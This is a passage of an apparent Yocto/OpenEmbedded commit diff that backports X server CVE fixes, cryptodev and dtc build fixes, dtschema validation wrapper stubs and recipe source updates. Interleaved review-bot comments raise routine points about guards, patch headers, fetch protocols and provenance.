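+ TouchEndPhysicallyActiveTouches(dev);
+@@ -511,6 +517,9 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ LeaveWindow(dev);
+ SetFocusOut(dev);
+
++ for (prev = &inputInfo.devices;
++ *prev && (*prev != dev); prev = &(*prev)->next);
++
+ *prev = dev->next;
+ dev->next = inputInfo.off_devices;
+ inputInfo.off_devices = dev;
+--
+GitLab
+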
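Review bot: The second list walk added before `*prev = dev->next;` is not followed by the `*prev != dev` test that the removed code had, so the unlink relies on `dev` still being on `inputInfo.devices` once the recursive calls have returned. If that ever failed to hold, the loop would stop on the list's terminating slot and the assignment would write `dev->next` there. Whether that state is reachable depends on the code between the two hunks, which is not visible here. If it is not reachable, a short comment before the walk saying why would settle it; otherwise restoring the old test after the walk, `if (*prev != dev) return FALSE;`, is the minimal guard, provided an early return at that point is acceptable to what follows. Either change should go upstream first, since this file is a verbatim backport.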
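--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-21886-2.patch
@@ -0,0 +1,57 @@
+From 26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8 Mon Sep 17 00:00:00 2001
+From: Peter Hutterer <peter.hutterer@who-t.net>
+Date: Fri, 5 Jan 2024 09:40:27 +1000
+Subject: [PATCH] dix: when disabling a master, float disabled slaved devices
+ too
+
+Disabling a master device floats all slave devices but we didn't do this
+to already-disabled slave devices. As a result those devices kept their
+reference to the master device resulting in access to already freed
+memory if the master device was removed before the corresponding slave
+device.
+
+And to match this behavior, also forcibly reset that pointer during
+CloseDownDevices().
+
+Related to CVE-2024-21886, ZDI-CAN-22840
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/26769aa71fcbe0a8403b7fb13b7c9010cc07c3a8]
+CVE: CVE-2024-21886
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ dix/devices.c | 12 ++++++++++++
+ 1 file changed, 12 insertions(+)
+
+diff --git a/dix/devices.c b/dix/devices.c
+index 389d28a23c..84a6406d13 100644
+--- a/dix/devices.c
++++ b/dix/devices.c
+@@ -483,6 +483,13 @@ DisableDevice(DeviceIntPtr dev, BOOL sendevent)
+ flags[other->id] |= XISlaveDetached;
+ }
+ }
++
++ for (other = inputInfo.off_devices; other; other = other->next) {
++ if (!IsMaster(other) && GetMaster(other, MASTER_ATTACHED) == dev) {
++ AttachDevice(NULL, other, NULL);
++ flags[other->id] |= XISlaveDetached;
++ }
++ }
+ }
+ else {
+ for (other = inputInfo.devices; other; other = other->next) {
+@@ -1088,6 +1095,11 @@ CloseDownDevices(void)
+ dev->master = NULL;
+ }
+
++ for (dev = inputInfo.off_devices; dev; dev = dev->next) {
++ if (!IsMaster(dev) && !IsFloating(dev))
++ dev->master = NULL;
++ }
++
+ CloseDeviceList(&inputInfo.devices);
+ CloseDeviceList(&inputInfo.off_devices);
+
+--
+GitLab
+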
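--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31080.patch
@@ -0,0 +1,49 @@
+From 96798fc1967491c80a4d0c8d9e0a80586cb2152b Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:51:45 -0700
+Subject: [PATCH] Xi: ProcXIGetSelectedEvents needs to use unswapped length to
+ send reply
+
+CVE-2024-31080
+
+Reported-by: https://debbugs.gnu.org/cgi/bugreport.cgi?bug=69762
+Fixes: 53e821ab4 ("Xi: add request processing for XIGetSelectedEvents.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/96798fc1967491c80a4d0c8d9e0a80586cb2152b]
+CVE: CVE-2024-31080
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xiselectev.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xiselectev.c b/Xi/xiselectev.c
+index edcb8a0d36..ac14949871 100644
+--- a/Xi/xiselectev.c
++++ b/Xi/xiselectev.c
+@@ -349,6 +349,7 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ InputClientsPtr others = NULL;
+ xXIEventMask *evmask = NULL;
+ DeviceIntPtr dev;
++ uint32_t length;
+
+ REQUEST(xXIGetSelectedEventsReq);
+ REQUEST_SIZE_MATCH(xXIGetSelectedEventsReq);
+@@ -418,10 +419,12 @@ ProcXIGetSelectedEvents(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIGetSelectedEvents swaps it */
++ length = reply.length;
+ WriteReplyToClient(client, sizeof(xXIGetSelectedEventsReply), &reply);
+
+ if (reply.num_masks)
+- WriteToClient(client, reply.length * 4, buffer);
++ WriteToClient(client, length * 4, buffer);
+
+ free(buffer);
+ return Success;
+--
+GitLab
+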
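Review bot: The patch header has no `---` line between the last trailer (`Signed-off-by: Ashish Sharma <asharma@mvista.com>`) and the diffstat, unlike the other xserver backports added in this commit; CVE-2024-31081.patch has the same omission. Tools that split the message from the diff at `---` will fold the diffstat lines into the commit message. Add a line containing only `---` after that Signed-off-by in both files. The code change is sound as shown: `length` is captured before WriteReplyToClient() can byte-swap `reply.length`, so the later `length * 4` is the real payload size rather than a swapped value used as a byte count.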
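--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg/CVE-2024-31081.patch
@@ -0,0 +1,47 @@
+From 3e77295f888c67fc7645db5d0c00926a29ffecee Mon Sep 17 00:00:00 2001
+From: Alan Coopersmith <alan.coopersmith@oracle.com>
+Date: Fri, 22 Mar 2024 18:56:27 -0700
+Subject: [PATCH] Xi: ProcXIPassiveGrabDevice needs to use unswapped length to
+ send reply
+
+CVE-2024-31081
+
+Fixes: d220d6907 ("Xi: add GrabButton and GrabKeysym code.")
+Signed-off-by: Alan Coopersmith <alan.coopersmith@oracle.com>
+Part-of: <https://gitlab.freedesktop.org/xorg/xserver/-/merge_requests/1463>
+
+Upstream-Status: Backport [https://gitlab.freedesktop.org/xorg/xserver/-/commit/3e77295f888c67fc7645db5d0c00926a29ffecee]
+CVE: CVE-2024-31081
+Signed-off-by: Ashish Sharma <asharma@mvista.com>
+
+ Xi/xipassivegrab.c | 5 ++++-
+ 1 file changed, 4 insertions(+), 1 deletion(-)
+
+diff --git a/Xi/xipassivegrab.c b/Xi/xipassivegrab.c
+index c9ac2f8553..896233bec2 100644
+--- a/Xi/xipassivegrab.c
++++ b/Xi/xipassivegrab.c
+@@ -93,6 +93,7 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ GrabParameters param;
+ void *tmp;
+ int mask_len;
++ uint32_t length;
+
+ REQUEST(xXIPassiveGrabDeviceReq);
+ REQUEST_FIXED_SIZE(xXIPassiveGrabDeviceReq,
+@@ -247,9 +248,11 @@ ProcXIPassiveGrabDevice(ClientPtr client)
+ }
+ }
+
++ /* save the value before SRepXIPassiveGrabDevice swaps it */
++ length = rep.length;
+ WriteReplyToClient(client, sizeof(rep), &rep);
+ if (rep.num_modifiers)
+- WriteToClient(client, rep.length * 4, modifiers_failed);
++ WriteToClient(client, length * 4, modifiers_failed);
+
+ out:
+ free(modifiers_failed);
+--
+GitLab
+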
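--- /dev/null
+++ b/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.14.bb
@@ -0,0 +1,61 @@
+require xserver-xorg.inc
+
+SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
+ file://pkgconfig.patch \
+ file://0001-test-xtest-Initialize-array-with-braces.patch \
+ file://sdksyms-no-build-path.patch \
+ file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
+ file://CVE-2022-3550.patch \
+ file://CVE-2022-3551.patch \
+ file://CVE-2022-3553.patch \
+ file://CVE-2022-4283.patch \
+ file://CVE-2022-46340.patch \
+ file://CVE-2022-46341.patch \
+ file://CVE-2022-46342.patch \
+ file://CVE-2022-46343.patch \
+ file://CVE-2022-46344.patch \
+ file://CVE-2023-0494.patch \
+ file://CVE-2023-1393.patch \
+ file://CVE-2023-5367.patch \
+ file://CVE-2023-5380.patch \
+ file://CVE-2023-6377.patch \
+ file://CVE-2023-6478.patch \
+ file://CVE-2023-6816.patch \
+ file://CVE-2024-0229-1.patch \
+ file://CVE-2024-0229-2.patch \
+ file://CVE-2024-0229-3.patch \
+ file://CVE-2024-0229-4.patch \
+ file://CVE-2024-21885.patch \
+ file://CVE-2024-21886-1.patch \
+ file://CVE-2024-21886-2.patch \
+ file://CVE-2024-0408.patch \
+ file://CVE-2024-0409.patch \
+ file://CVE-2024-31081.patch \
+ file://CVE-2024-31080.patch \
+"
+SRC_URI[md5sum] = "453fc86aac8c629b3a5b77e8dcca30bf"
+SRC_URI[sha256sum] = "54b199c9280ff8bf0f73a54a759645bd0eeeda7255d1c99310d5b7595f3ac066"
+
+CFLAGS += "-fcommon"
+
+# These extensions are now integrated into the server, so declare the migration
+# path for in-place upgrades.
+
+RREPLACES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RPROVIDES_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "
+RCONFLICTS_${PN} = "${PN}-extension-dri \
+ ${PN}-extension-dri2 \
+ ${PN}-extension-record \
+ ${PN}-extension-extmod \
+ ${PN}-extension-dbe \
+ "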
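--- a/meta/recipes-graphics/xorg-xserver/xserver-xorg_1.20.8.bb
+++ /dev/null
@@ -1,39 +0,0 @@
-require xserver-xorg.inc
-
-SRC_URI += "file://0001-xf86pciBus.c-use-Intel-ddx-only-for-pre-gen4-hardwar.patch \
- file://pkgconfig.patch \
- file://0001-test-xtest-Initialize-array-with-braces.patch \
- file://sdksyms-no-build-path.patch \
- file://0001-drmmode_display.c-add-missing-mi.h-include.patch \
- file://CVE-2020-14347.patch \
- file://CVE-2020-14346.patch \
- file://CVE-2020-14361.patch \
- file://CVE-2020-14362.patch \
- file://CVE-2020-14345.patch \
- "
-SRC_URI[md5sum] = "a770aec600116444a953ff632f51f839"
-SRC_URI[sha256sum] = "d17b646bee4ba0fb7850c1cc55b18e3e8513ed5c02bdf38da7e107f84e2d0146"
-
-CFLAGS += "-fcommon"
-
-# These extensions are now integrated into the server, so declare the migration
-# path for in-place upgrades.
-
-RREPLACES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RPROVIDES_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "
-RCONFLICTS_${PN} = "${PN}-extension-dri \
- ${PN}-extension-dri2 \
- ${PN}-extension-record \
- ${PN}-extension-extmod \
- ${PN}-extension-dbe \
- "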
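--- a/meta/recipes-kernel/blktrace/blktrace_git.bb
+++ b/meta/recipes-kernel/blktrace/blktrace_git.bb
@@ -1,4 +1,9 @@
 SUMMARY = "Generates traces of I/O traffic on block devices"
+DESCRIPTION = "blktrace is a block layer IO tracing mechanism which provides \
+detailed information about request queue operations up to user space. There \
+are three major components: a kernel component, a utility to record the i/o \
+trace information for the kernel to user space, and utilities to analyse and \
+view the trace information."
 HOMEPAGE = "http://brick.kernel.dk/snaps/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
@@ -9,7 +14,7 @@ SRCREV = "cca113f2fe0759b91fd6a0e10fdcda2c28f18a7e"
 
 PV = "1.2.0+git${SRCPV}"
 
-SRC_URI = "git://git.kernel.dk/blktrace.git \
+SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master \
  file://ldflags.patch \
  file://CVE-2018-10689.patch \
  file://make-btt-scripts-python3-ready.patch \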
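Review bot: The updated SRC_URI still fetches over the unauthenticated `git://` transport, because only `branch=master` was added; cryptodev.inc in this same commit also adds `protocol=https`. The pinned SRCREV limits what a tampered fetch can deliver, but an https transport additionally protects the ref advertisement and works on networks that block port 9418. Where the host serves it, use `SRC_URI = "git://git.kernel.dk/blktrace.git;branch=master;protocol=https \`. The same applies to the SRC_URI lines changed in dtc.inc, kern-tools-native_git.bb and kmod.inc.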
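--- a/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
+++ b/meta/recipes-kernel/cryptodev/cryptodev-module_1.10.bb
@@ -9,6 +9,9 @@ DEPENDS += "cryptodev-linux"
 
 SRC_URI += " \
 file://0001-Disable-installing-header-file-provided-by-another-p.patch \
+file://0001-Fix-build-for-Linux-5.8-rc1.patch \
+file://0001-Fix-build-for-Linux-5.9-rc1.patch \
+file://fix-build-for-Linux-5.11-rc1.patch \
 "
 
 EXTRA_OEMAKE='KERNEL_DIR="${STAGING_KERNEL_DIR}" PREFIX="${D}"'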
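--- a/meta/recipes-kernel/cryptodev/cryptodev.inc
+++ b/meta/recipes-kernel/cryptodev/cryptodev.inc
@@ -1,9 +1,14 @@
 HOMEPAGE = "http://cryptodev-linux.org/"
+DESCRIPTION = "Cryptodev-linux is a device that allows access to Linux kernel \
+cryptographic drivers; thus allowing of userspace applications to take advantage \
+of hardware accelerators. Cryptodev-linux is implemented as a standalone \
+module that requires no dependencies other than a stock linux kernel. Its \
+API is compatible with OpenBSD's cryptodev userspace API (/dev/crypto)."
 
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263"
 
-SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux \
+SRC_URI = "git://github.com/cryptodev-linux/cryptodev-linux;branch=master;protocol=https \
  "
 SRCREV = "a87053bee5680878c295b7d23cf0d7065576ac2b"
 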
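--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.8-rc1.patch
@@ -0,0 +1,49 @@
+From 9e765068582aae3696520346a7500322ca6cc2de Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Sat, 13 Jun 2020 19:46:44 +0200
+Subject: [PATCH] Fix build for Linux 5.8-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=9740ca4e95b43b91a4a848694a20d01ba6818f7b
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=da1c55f1b272f4bd54671d459b39ea7b54944ef9
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=d8ed45c5dcd455fc5848d47f86883a1b872ac0d0
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [9e765068582aae3696520346a7500322ca6cc2de]
+
+Signed-off-by: He Zhe <zhe.he@windriver.com>
+---
+ zc.c | 8 ++++++++
+ 1 file changed, 8 insertions(+)
+
+diff --git a/zc.c b/zc.c
+index ae464ff..2c286bb 100644
+--- a/zc.c
++++ b/zc.c
+@@ -58,7 +58,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ return 0;
+ }
+
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ down_read(&mm->mmap_sem);
++#else
++ mmap_read_lock(mm);
++#endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 6, 0))
+ ret = get_user_pages(task, mm,
+ (unsigned long)addr, pgcount, write, 0, pg, NULL);
+@@ -74,7 +78,11 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
+ #endif
++#if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
++#else
++ mmap_read_unlock(mm);
++#endif
+ if (ret != pgcount)
+ return -EINVAL;
+
+--
+2.17.1
+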
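Review bot: `Upstream-Status: Backport [9e765068582aae3696520346a7500322ca6cc2de]` gives only a bare hash, while the 5.9 and 5.11 patches added next to it give the full commit URL. Someone checking the provenance of this kernel-module patch has to guess which repository the hash belongs to. Following the form the sibling patches use, write `Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/9e765068582aae3696520346a7500322ca6cc2de]`, after confirming the hash resolves there.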
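--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/0001-Fix-build-for-Linux-5.9-rc1.patch
@@ -0,0 +1,42 @@
+From 2f5e08aebf9229599aae7f25db752f74221cd71d Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Fri, 14 Aug 2020 00:13:38 +0200
+Subject: [PATCH] Fix build for Linux 5.9-rc1
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=64019a2e467a288a16b65ab55ddcbf58c1b00187
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=bce617edecada007aee8610fbe2c14d10b8de2f6
+ https://lore.kernel.org/lkml/CAHk-=wj_V2Tps2QrMn20_W0OJF9xqNh52XSGA42s-ZJ8Y+GyKw@mail.gmail.com/
+
+Signed-off-by: Joan Bruguera <joanbrugueram@gmail.com>
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/2f5e08aebf9229599aae7f25db752f74221cd71d]
+
+Signed-off-by: Naveen Saini <naveen.kumar.saini@intel.com>
+
+---
+ zc.c | 6 +++++-
+ 1 file changed, 5 insertions(+), 1 deletion(-)
+
+diff --git a/zc.c b/zc.c
+index a560db5..fdf7da1 100644
+--- a/zc.c
++++ b/zc.c
+@@ -76,10 +76,14 @@ int __get_userbuf(uint8_t __user *addr, uint32_t len, int write,
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 9, 0))
+ ret = get_user_pages_remote(task, mm,
+ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
+ pg, NULL, NULL);
++#else
++ ret = get_user_pages_remote(mm,
++ (unsigned long)addr, pgcount, write ? FOLL_WRITE : 0,
++ pg, NULL, NULL);
+ #endif
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(5, 8, 0))
+ up_read(&mm->mmap_sem);
+--
+2.17.1
+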
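--- /dev/null
+++ b/meta/recipes-kernel/cryptodev/files/fix-build-for-Linux-5.11-rc1.patch
@@ -0,0 +1,32 @@
+From 55c6315058fc0dd189ffd116f2cc27ba4fa84cb6 Mon Sep 17 00:00:00 2001
+From: Joan Bruguera <joanbrugueram@gmail.com>
+Date: Mon, 28 Dec 2020 01:41:31 +0100
+Subject: [PATCH] Fix build for Linux 5.11-rc1
+
+ksys_close was removed, as far as I can tell, close_fd replaces it.
+
+See also: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=8760c909f54a82aaa6e76da19afe798a0c77c3c3
+ https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=1572bfdf21d4d50e51941498ffe0b56c2289f783
+
+Upstream-Status: Backport [https://github.com/cryptodev-linux/cryptodev-linux/commit/55c6315058fc0dd189ffd116f2cc27ba4fa84cb6]
+Signed-off-by: Anuj Mittal <anuj.mittal@intel.com>
+---
+ ioctl.c | 4 +++-
+ 1 file changed, 3 insertions(+), 1 deletion(-)
+
+diff --git a/ioctl.c b/ioctl.c
+index 3d332380..95481d4f 100644
+--- a/ioctl.c
++++ b/ioctl.c
+@@ -871,8 +871,10 @@ cryptodev_ioctl(struct file *filp, unsigned int cmd, unsigned long arg_)
+ if (unlikely(ret)) {
+ #if (LINUX_VERSION_CODE < KERNEL_VERSION(4, 17, 0))
+ sys_close(fd);
+-#else
++#elif (LINUX_VERSION_CODE < KERNEL_VERSION(5, 11, 0))
+ ksys_close(fd);
++#else
++ close_fd(fd);
+ #endif
+ return ret;
+ }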
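--- a/meta/recipes-kernel/dtc/dtc.inc
+++ b/meta/recipes-kernel/dtc/dtc.inc
@@ -5,7 +5,7 @@ SECTION = "bootloader"
 LICENSE = "GPLv2 | BSD"
 DEPENDS = "flex-native bison-native"
 
-SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git \
+SRC_URI = "git://git.kernel.org/pub/scm/utils/dtc/dtc.git;branch=master \
  file://make_install.patch \
  file://0001-dtc-Fix-Makefile-to-add-CFLAGS-not-override.patch \
  "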
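--- /dev/null
+++ b/meta/recipes-kernel/dtc/dtc/0001-fdtdump-Fix-gcc11-warning.patch
@@ -0,0 +1,35 @@
+From 4827e0db6c4f7dea7f4094f49d3bb48ef6dfdc2d Mon Sep 17 00:00:00 2001
+From: David Gibson <david@gibson.dropbear.id.au>
+Date: Wed, 6 Jan 2021 14:52:26 +1100
+Subject: [PATCH] fdtdump: Fix gcc11 warning
+
+In one place, fdtdump abuses fdt_set_magic(), passing it just a small char
+array instead of the full fdt header it expects. That's relying on the
+fact that in fact fdt_set_magic() will only actually access the first 4
+bytes of the buffer.
+
+This trips a new warning in GCC 11 - and it's entirely possible it was
+always UB. So, don't do that.
+
+Upstream-Status: Backport [https://git.kernel.org/pub/scm/utils/dtc/dtc.git/patch/?id=ca16a723fa9dde9c5da80dba567f48715000e77c]
+Signed-off-by: David Gibson <david@gibson.dropbear.id.au>
+---
+ fdtdump.c | 2 +-
+ 1 file changed, 1 insertion(+), 1 deletion(-)
+
+diff --git a/fdtdump.c b/fdtdump.c
+index 9613bef..d9fb374 100644
+--- a/fdtdump.c
++++ b/fdtdump.c
+@@ -217,7 +217,7 @@ int main(int argc, char *argv[])
+ char *p = buf;
+ char *endp = buf + len;
+
+- fdt_set_magic(smagic, FDT_MAGIC);
++ fdt32_st(smagic, FDT_MAGIC);
+
+ /* poor man's memmem */
+ while ((endp - p) >= FDT_MAGIC_SIZE) {
+--
+2.30.1
+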
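Review bot: The two provenance fields in the patch header disagree: the `From` line names commit 4827e0db6c4f7dea7f4094f49d3bb48ef6dfdc2d, while the Upstream-Status URL points at id=ca16a723fa9dde9c5da80dba567f48715000e77c. Presumably the first is a local hash produced when the patch was regenerated, but a reader cannot tell that from the file. If so, either keep the upstream id in the first line, `From ca16a723fa9dde9c5da80dba567f48715000e77c Mon Sep 17 00:00:00 2001`, or add a sentence to the header saying the patch was refreshed against this tree. The header also carries no Signed-off-by from the person who did the backport, which the other patches added in this commit have.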
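--- a/meta/recipes-kernel/dtc/dtc_1.6.0.bb
+++ b/meta/recipes-kernel/dtc/dtc_1.6.0.bb
@@ -5,6 +5,8 @@ LIC_FILES_CHKSUM = "file://GPL;md5=b234ee4d69f5fce4486a80fdaf4a4263 \
 
 SRCREV = "2525da3dba9beceb96651dc2986581871dbeca30"
 
+SRC_URI += "file://0001-fdtdump-Fix-gcc11-warning.patch"
+
 S = "${WORKDIR}/git"
 
 BBCLASSEXTEND = "native nativesdk"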
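--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-doc-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-doc-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-doc-validate.real "$@"
+
+# we always succeed
+exit 0
+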
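Review bot: The wrapper exits 0 for every invocation and prints nothing unless `--version` is passed, so a build that calls it gets a silent pass with no schema checking done; dt-mk-schema and dt-validate are identical in this respect. That is the stated intent ("we always succeed"), but in the logs the result cannot be told apart from a real validation run. A one-line notice on stderr before `exit 0` would make the skipped check visible, for example `echo "dt-doc-validate: wrapper stub, no validation performed" >&2`, assuming the kernel build does not treat stderr output from these tools as a failure.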
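--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-mk-schema
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-mk-schema wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-mk-schema.real "$@"
+
+# we always succeed
+exit 0
+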
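--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper/dt-validate
@@ -0,0 +1,20 @@
+#!/bin/sh
+# dt-validate wrapper to allow kernel dt-validation to pass
+#
+# Copyright (C) 2021 Bruce Ashfield <bruce.ashfield@gmail.com>
+# License: MIT (see COPYING.MIT at the root of the repository for terms)
+
+for arg; do
+ case "$arg" in
+ --version)
+ echo "v2021.10"
+ ;;
+ esac
+done
+
+# TBD: left for future consideration
+# exec dt-validate.real "$@"
+
+# we always succeed
+exit 0
+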
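--- /dev/null
+++ b/meta/recipes-kernel/dtc/python3-dtschema-wrapper_2021.10.bb
@@ -0,0 +1,17 @@
+DESCRIPTION = "Wrapper for tooling for devicetree validation using YAML and jsonschema"
+HOMEPAGE = "https://yoctoproject.org"
+LICENSE = "MIT"
+LIC_FILES_CHKSUM = "file://${COREBASE}/meta/COPYING.MIT;md5=3da9cfbcb788c80a0384361b4de20420"
+
+SRC_URI = "file://dt-doc-validate \
+ file://dt-mk-schema \
+ file://dt-validate"
+
+do_install() {
+ install -d ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-doc-validate ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-mk-schema ${D}${bindir}/
+ install -m 755 ${WORKDIR}/dt-validate ${D}${bindir}/
+}
+
+BBCLASSEXTEND = "native nativesdk"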
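--- a/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
+++ b/meta/recipes-kernel/kern-tools/kern-tools-native_git.bb
@@ -1,4 +1,8 @@
 SUMMARY = "Tools for managing Yocto Project style branched kernels"
+DESCRIPTION = "Powerful set of tools or managing Yocto Linux kernel sources \
+and configuration data. You can use these tools to make a single configuration \
+change, apply multiple patches, or work with your own kernel sources."
+HOMEPAGE = "https://www.yoctoproject.org/"
 LICENSE = "GPLv2"
 LIC_FILES_CHKSUM = "file://tools/kgit;beginline=5;endline=9;md5=9c30e971d435e249624278c3e343e501"
 
@@ -10,7 +14,7 @@ PV = "0.2+git${SRCPV}"
 
 inherit native
 
-SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git"
+SRC_URI = "git://git.yoctoproject.org/yocto-kernel-tools.git;branch=master"
 S = "${WORKDIR}/git"
 UPSTREAM_CHECK_COMMITS = "1"
 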
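--- a/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
+++ b/meta/recipes-kernel/kexec/kexec-tools_2.0.20.bb
@@ -30,6 +30,9 @@ inherit autotools update-rc.d systemd
 export LDFLAGS = "-L${STAGING_LIBDIR}"
 EXTRA_OECONF = " --with-zlib=yes"
 
+# affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47.
+CVE_CHECK_WHITELIST += "CVE-2021-20269"
+
 do_compile_prepend() {
  # Remove the prepackaged config.h from the source tree as it overrides
  # the same file generated by configure and placed in the build tree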
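Review bot: The comment above `CVE_CHECK_WHITELIST += "CVE-2021-20269"` names the distro packages that are affected but not why this recipe is unaffected, which is what someone auditing the CVE report needs to know. If the reasoning is that the flaw lives in the Fedora/RHEL packaging rather than in the upstream sources built here, say so, e.g. `# CVE-2021-20269 only affects the kexec-tools packages shipped by Fedora (< 2.0.21-8) and RHEL (< 2.0.20-47), not the upstream 2.0.20 sources built by this recipe`. A whitelist entry hides the finding in every later cve-check run, so the justification should be checkable from the recipe alone.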
diff --git a/meta/recipes-kernel/kmod/kmod.inc b/meta/recipes-kernel/kmod/kmod.inc
index 5dae30ed88..631b50658a 100644
--- a/meta/recipes-kernel/kmod/kmod.inc
+++ b/meta/recipes-kernel/kmod/kmod.inc
@@ -18,7 +18,7 @@ SRCREV = "58133a96c894c043e48c74ddf0bfe8db90bac62f"
18# Lookout for PV bump too when SRCREV is changed 18# Lookout for PV bump too when SRCREV is changed
19PV = "26" 19PV = "26"
20 20
21SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \ 21SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git;branch=master \
22 file://depmod-search.conf \ 22 file://depmod-search.conf \
23 file://0001-build-Stop-using-dolt.patch \ 23 file://0001-build-Stop-using-dolt.patch \
24 file://avoid_parallel_tests.patch \ 24 file://avoid_parallel_tests.patch \
@@ -26,7 +26,6 @@ SRC_URI = "git://git.kernel.org/pub/scm/utils/kernel/kmod/kmod.git \
26 26
27S = "${WORKDIR}/git" 27S = "${WORKDIR}/git"
28 28
29EXTRA_AUTORECONF += "--install --symlink"
30EXTRA_OECONF +=" --enable-tools --with-zlib" 29EXTRA_OECONF +=" --enable-tools --with-zlib"
31 30
32PACKAGECONFIG[debug] = "--enable-debug,--disable-debug" 31PACKAGECONFIG[debug] = "--enable-debug,--disable-debug"
diff --git a/meta/recipes-kernel/kmod/kmod/ptest.patch b/meta/recipes-kernel/kmod/kmod/ptest.patch
deleted file mode 100644
index 831dbcb909..0000000000
--- a/meta/recipes-kernel/kmod/kmod/ptest.patch
+++ /dev/null
@@ -1,25 +0,0 @@
1Add 'install-ptest' rule.
2
3Signed-off-by: Tudor Florea <tudor.florea@enea.com>
4Upstream-Status: Pending
5
